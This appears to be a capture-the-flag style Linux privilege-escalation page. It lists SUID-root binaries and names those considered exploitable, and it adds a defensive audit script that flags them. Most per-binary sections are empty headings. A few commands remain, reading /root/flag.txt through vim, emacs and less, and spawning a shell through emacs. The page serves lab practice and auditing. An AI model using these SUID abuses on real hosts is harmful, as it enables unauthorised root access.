Linux Privesc Playground

Last updated 5 years ago

All the files with SUID bit set that belong to root:

-bash-4.2$ find / -user root -perm /4000 2>/dev/null
/usr/sbin/arp
/usr/sbin/node
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/wget
/usr/bin/cut
/usr/bin/base64
/usr/bin/traceroute6.iputils
/usr/bin/tail
/usr/bin/aria2c
/usr/bin/ul
/usr/bin/shuf
/usr/bin/php5
/usr/bin/gpasswd
/usr/bin/make
/usr/bin/openssl
/usr/bin/file
/usr/bin/tclsh8.5
/usr/bin/env
/usr/bin/diff
/usr/bin/watch
/usr/bin/strace
/usr/bin/rlwrap
/usr/bin/expand
/usr/bin/fold
/usr/bin/vim.basic
/usr/bin/timeout
/usr/bin/xargs
/usr/bin/expect
/usr/bin/chsh
/usr/bin/jq
/usr/bin/perl5.14.2
/usr/bin/readelf
/usr/bin/sudo
/usr/bin/ionice
/usr/bin/sudoedit
/usr/bin/unshare
/usr/bin/time
/usr/bin/taskset
/usr/bin/mtr
/usr/bin/emacs23-x
/usr/bin/flock
/usr/bin/tee
/usr/bin/xxd
/usr/bin/setarch
/usr/bin/python2.7
/usr/bin/uniq
/usr/bin/head
/usr/bin/sort
/usr/bin/newgrp
/usr/bin/stdbuf
/usr/bin/nl
/usr/bin/perl
/usr/bin/tftp
/usr/bin/find
/usr/bin/passwd
/usr/bin/rsync
/usr/bin/docker
/usr/bin/pg
/usr/bin/fmt
/usr/bin/nice
/usr/bin/od
/usr/bin/chfn
/usr/bin/gimp-2.6
/usr/bin/gdb
/usr/bin/unexpand
/sbin/dmsetup
/sbin/start-stop-daemon
/sbin/logsave
/bin/sed
/bin/mount
/bin/mv
/bin/cp
/bin/dash
/bin/ksh93
/bin/chmod
/bin/ping
/bin/chown
/bin/fusermount
/bin/bash
/bin/nano
/bin/ip
/bin/more
/bin/cat
/bin/zsh4
/bin/less
/bin/su
/bin/busybox
/bin/dd
/bin/grep
/bin/run-parts
/bin/ping6
/bin/date
/bin/bsd-csh
/bin/umount

All the binaries that can be exploited in the list above:

arp
node
wget
cut
base64
tail
ul
aria2c
shuf
php5
make
openssl
file
tclsh
env
diff
watch
strace
rlwrap
expand
fold
vim
xargs
timeout
expect
jq
perl
readelf
ionice
time
unshare
taskset
mtr
emacs
flock
tee
xxd
setarch
python
uniq
sort
head
stdbuf
nl
tftp
find
rsync
pg
docker
fmt
nice
od
gdb
gimp
unexpand
dmsetup
start-stop-daemon
sed
mount
logsave
mv
dash
cp
ksh
chmod
chown
bash
nano
more
ip
cat
zsh
less
busybox
dd
grep
run-parts
date
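
An added example (not part of the original page): an audit helper that reads `find` output like the listing above and reports which SUID-root paths map to a name on this page's list, normalising packaging suffixes such as `tclsh8.5` or `vim.basic`. The function names and the sample input are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag SUID-root paths whose tool name is on the page's list.

# Names copied from the page's list of exploitable binaries.
WATCHLIST="arp node wget cut base64 tail ul aria2c shuf php5 make openssl file
tclsh env diff watch strace rlwrap expand fold vim xargs timeout expect jq perl
readelf ionice time unshare taskset mtr emacs flock tee xxd setarch python uniq
sort head stdbuf nl tftp find rsync pg docker fmt nice od gdb gimp unexpand
dmsetup start-stop-daemon sed mount logsave mv dash cp ksh chmod chown bash nano
more ip cat zsh less busybox dd grep run-parts date"
WATCH_FLAT=" $(echo $WATCHLIST) "   # flattened to one space-delimited line

# on_watchlist NAME -> exit status 0 if NAME is on the list
on_watchlist() {
    case "$WATCH_FLAT" in *" $1 "*) return 0 ;; esac
    return 1
}

# normalize_name NAME -> name without packaging or version suffix
# (tclsh8.5 -> tclsh, vim.basic -> vim, emacs23-x -> emacs, gimp-2.6 -> gimp)
normalize_name() {
    printf '%s\n' "$1" | sed -E 's/\.[a-z]+$//; s/[-.]?[0-9][0-9.]*(-[a-z]+)?$//'
}

# flag_suid: paths on stdin, one per line; prints "name<TAB>path" for matches.
# The exact basename is tried first so names such as base64 are not truncated.
flag_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=$(basename "$path")
        if ! on_watchlist "$name"; then
            name=$(normalize_name "$name")
        fi
        if on_watchlist "$name"; then
            printf '%s\t%s\n' "$name" "$path"
        fi
    done
    return 0
}

# Constructed sample: a few paths taken from the find output above.
SAMPLE='/usr/sbin/arp
/usr/lib/openssh/ssh-keysign
/usr/bin/tclsh8.5
/usr/bin/vim.basic
/usr/bin/emacs23-x
/usr/bin/aria2c
/usr/bin/passwd
/bin/ksh93'
printf '%s\n' "$SAMPLE" | flag_suid
```

On a host under review, pipe the page's own command into it after defining the functions: `find / -user root -perm /4000 2>/dev/null | flag_suid`.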

arp

cut

base64

tail

ul

shuf

php

openssl

file

tclsh

env

diff

strace

rlwrap

expand

fold

vim

vim /root/flag.txt

getting a shell

xargs

getting a shell

timeout

expect

jq

readelf

ionice

time

unshare

taskset

emacs

emacs /root/flag.txt

getting a shell

emacs -Q -nw --eval '(term "/bin/sh")'

flock

xxd

setarch

python

getting shell

uniq

sort

head

stdbuf

nl

find

getting shell

rsync

pg

getting shell

fmt

nice

od

gdb

unexpand

start-stop-daemon

sed

getting shell

logsave

dash

cp

ksh

getting shell

bash

more

ip

cat

zsh

less

less /root/flag.txt

dd

grep

run-parts

date